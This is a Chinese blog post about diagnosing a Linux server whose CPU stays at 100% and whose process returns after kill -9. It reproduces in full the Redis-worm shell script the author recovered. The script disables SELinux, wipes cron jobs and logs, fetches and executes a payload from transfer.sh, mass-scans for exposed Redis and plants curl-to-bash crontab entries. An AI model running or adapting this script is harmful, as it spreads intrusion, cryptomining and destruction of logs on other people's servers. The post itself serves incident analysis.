Linux CPU 100%, kill -9 杀不掉进程
1: top 查看
>top -c
此时 我们使用kill -9 15003, 杀掉这个进程短暂的CPU降低几秒, 然后死灰复燃了, 又一个进程占了CPU 99%
2: 查看15003 进程状态,
> cat /proc/15003/status
Pid :当前进程ID
PPid:当前进程的父进程 此时执行2次杀进程
- kill -
- kill -
如果还是不行,本博主也不知道,重启服务器...
第二天发现一个问题redis 出现了Backup 3个key,存了一个url https://transfer.sh/W5hJO/tmp.p9ArkdNk6P
打开连接,下载了tmp.p9ArkNK6p文件, 使用Notepad++打开, 发现最新型的pnscan病毒
- sleep
- find . -maxdepth -name ".mxff0" -type f -mmin + -delete
- [ -f .mxff0 ] && exit
- echo > .mxff0
- trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT
- setenforce >/dev/null
- echo SELINUX=disabled > /etc/sysconfig/selinux >/dev/null
- crontab -r >/dev/null
- rm -rf /var/spool/cron >/dev/null
- grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf
- rm -rf /tmp/* 2>/dev/null
- rm -rf /var/tmp/* 2>/dev/null
- rm -rf /etc/root.sh 2>/dev/null
- sync && echo 3 > /proc/sys/vm/drop_caches
- cat <<EOF> /etc/security/limits.conf
- * hard nofile 100000
- * soft nofile 100000
- root hard nofile 100000
- root soft nofile 100000
- * hard nproc 100000
- * soft nproc 100000
- root hard nproc 100000
- root soft nproc 100000
- EOF
- iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
- iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
- ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done
- rm -rf /tmp/* 2>/dev/null
- rm -rf /var/tmp/* 2>/dev/null
- echo 0 > /var/spool/mail/root
- echo 0 > /var/log/wtmp
- echo 0 > /var/log/secure
- echo 0 > /root/.bash_history
- YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"
- DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"
- if cat /etc/*release | grep -i CentOS; then
- yum clean all
- yum install -y -q epel-release
- yum install -y -q $YUM_PACKAGE_NAME
- elif cat /etc/*release | grep -qi Red; then
- yum clean all
- yum install -y -q epel-release
- yum install -y -q $YUM_PACKAGE_NAME
- elif cat /etc/*release | grep -qi Fedora; then
- yum clean all
- yum install -y -q epel-release
- yum install -y -q $YUM_PACKAGE_NAME
- elif cat /etc/*release | grep -qi Ubuntu; then
- export DEBIAN_FRONTEND=noninteractive
- rm -rf /var/lib/apt/lists/*
- apt-get update -q --fix-missing
- for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
- elif cat /etc/*release | grep -qi Debian; then
- export DEBIAN_FRONTEND=noninteractive
- rm -rf /var/lib/apt/lists/*
- apt-get update --fix-missing
- for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
- elif cat /etc/*release | grep -qi Mint; then
- export DEBIAN_FRONTEND=noninteractive
- rm -rf /var/lib/apt/lists/*
- apt-get update --fix-missing
- for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
- elif cat /etc/*release | grep -qi Knoppix; then
- export DEBIAN_FRONTEND=noninteractive
- rm -rf /var/lib/apt/lists/*
- apt-get update --fix-missing
- for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
- else
- exit 1
- fi
- sleep 1
- if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
- curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12
- sleep 1
- [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112
- fi
- tname=$( mktemp )
- OMURL=https://transfer.sh/HlrkQ/tmp.gIMakllioJ
- curl -s $OMURL > $tname || wget -q -O $tname $OMURL
- NMURL=$( curl -s --upload-file $tname https://transfer.sh )
- mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg
- [ -z "$NMURL" ] && NMURL=$OMURL
- ncmd=$(basename $(mktemp))
- sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd
- NSURL=$( curl -s --upload-file $ncmd https://transfer.sh )
- echo 'flushall' > .dat
- echo 'config set dir /var/spool/cron' >> .dat
- echo 'config set dbfilename root' >> .dat
- echo 'set Backup1 "\t\n*/ * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
- echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat
- echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
- echo 'save' >> .dat
- echo 'config set dir /var/spool/cron/crontabs' >> .dat
- echo 'save' >> .dat
- echo 'exit' >> .dat
- pnx=pnscan
- [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
- [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
- for x in $( seq | sort -R ); do
- for y in $( seq | sort -R ); do
- $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/ > .r.$x.$y.o
- awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
- while read -r h p; do
- cat .dat | redis-cli -h $h -p $p --raw &
- done < .r.$x.$y.l
- done
- done
- echo > /var/spool/mail/root >/dev/null
- echo > /var/log/wtmp >/dev/null
- echo > /var/log/secure >/dev/null
- echo > /root/.bash_history >/dev/null
- exit
Linux CPU 100%, kill -9 杀不掉进程的更多相关文章
- Linux---使用kill杀不掉进程解决方案
今天打开Linux虚拟机,然后使用jps命令查看,莫名奇妙多了一个1889进程 然后使用kill杀掉后,再运行jps还是存在此进程.于是乎开始大量百度,最终找到了解决方案. 说的很清楚了,杀不掉的原因 ...
- PostgreSQL 不要使用kill -9 杀 Postgresq 用户进程
转载:http://francs3.blog.163.com/blog/static/4057672720109854858308/ Postgresql 8.3.3 今天应用反映数据库很慢,有些SQ ...
- linux cpu 100% 脚本
for i in `seq 1 $(cat /proc/cpuinfo |grep "physical id" |wc -l)`; do dd if=/dev/zero of=/d ...
- Linux系统cpu 100%修复案例
Linux系统cpu 100%修复案例 阿里云技术支持团队:完颜镇江 案例背景: Linux主机连续三天CPU% 处理思路: 1. 登录服务器查看/var/log/messages+/var/lo ...
- ora-00031:session marked for kill处理oracle中杀不掉的锁
http://www.cnblogs.com/songdavid/articles/2223869.html 一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定 ...
- 【转】ora-00031:session marked for kill处理oracle中杀不掉的锁
一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长时间不释放,有时实在没办法,只好重启数据库.现在提供一种方法解决这种问题,那就是在ORACLE中杀不 ...
- ORA-00031: session marked for kill 处理Oracle中杀不掉的锁
一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长时间不释放,有时实在没办法,只好重启数据库.现在提供一种方法解决这种问题,那就是在ORACLE中杀不 ...
- session marked for kill处理oracle中杀不掉的锁
ora-00031:session marked for kill处理oracle中杀不掉的锁 一些ORACLE中的进程被杀掉后,状态被置为"killed",但是锁定的资源很长 ...
- 如何查找僵尸进程并Kill之,杀不掉的要查看父进程并杀之
转自:如何查找僵尸进程并Kill之,杀不掉的要查看父进程并杀之 用ps和grep命令寻找僵尸进程#ps -A -ostat,ppid,pid,cmd | grep -e '^[Zz]'命令注解:-A ...
随机推荐
- UVA-1613 K-Graph Oddity (着色问题)
题目大意:一张n个顶点.m条边的无向连通图,用k种颜色着色(相邻顶点颜色不能相同),其中k为不小于点的最大度数的最小奇数. 题目分析:水题一道.建张图深搜一下就行了. # include<ios ...
- 使用POI导入小数变成浮点数异常
例如 我在Excel中的数据为17.2, 导入到表中就变成了17.1999999或者17.20000001 原因是我用double接收了17.2,然后直接用了String去转换,精度就丢失了. 代 ...
- java并发编程:线程安全管理类--原子操作类--AtomicBoolean
1.类AtomicBoolean
- Sizzle源码分析:二 词法分析
上一篇我们了解了Sizzle的整体流程,下面我开始一点点分析各个流程,我们进行查询的第一步就是词法分析tokenize,同样先了解下思路,如果是#div_test > span input[ch ...
- 如何在JavaScript中手动创建类数组对象
前言 关于什么是js的类数组对象这里不再赘述.可以参考这个链接,还有这里. js中类数组对象很多,概念简单的讲就是看上去像数组,又不是数组,可以使用数字下标方式访问又没有数组方法. 例: argume ...
- eclipes常用快捷键
Eclipes快捷键 alt + / 代码补全,自动提示 ctrl + o 显示类中的方法属性,再按一次ctrl + o,显示更多的变量 ctrl + d 删除当前行 ctrl + / 单行注释或者选 ...
- L185 Ocean Shock
This is part of "Ocean Shock," a Reuters series exploring climate change's impact on sea c ...
- New Concept English Two 16 40
Keynote Speech are useful. $课文38 唯独没有考虑到天气 388. My old friend, Harrison, had lived in the Mediterr ...
- jinja 2 filter 使用
文档地址 http://jinja.pocoo.org/docs/templates/#builtin-filters indent indent(s, width=4, indentfirst=Fa ...
- CIE-LUV是什么颜色特征
参考文献:维基百科 a simple-to-compute transformation of the 1931 CIE XYZ color space, but which attempted pe ...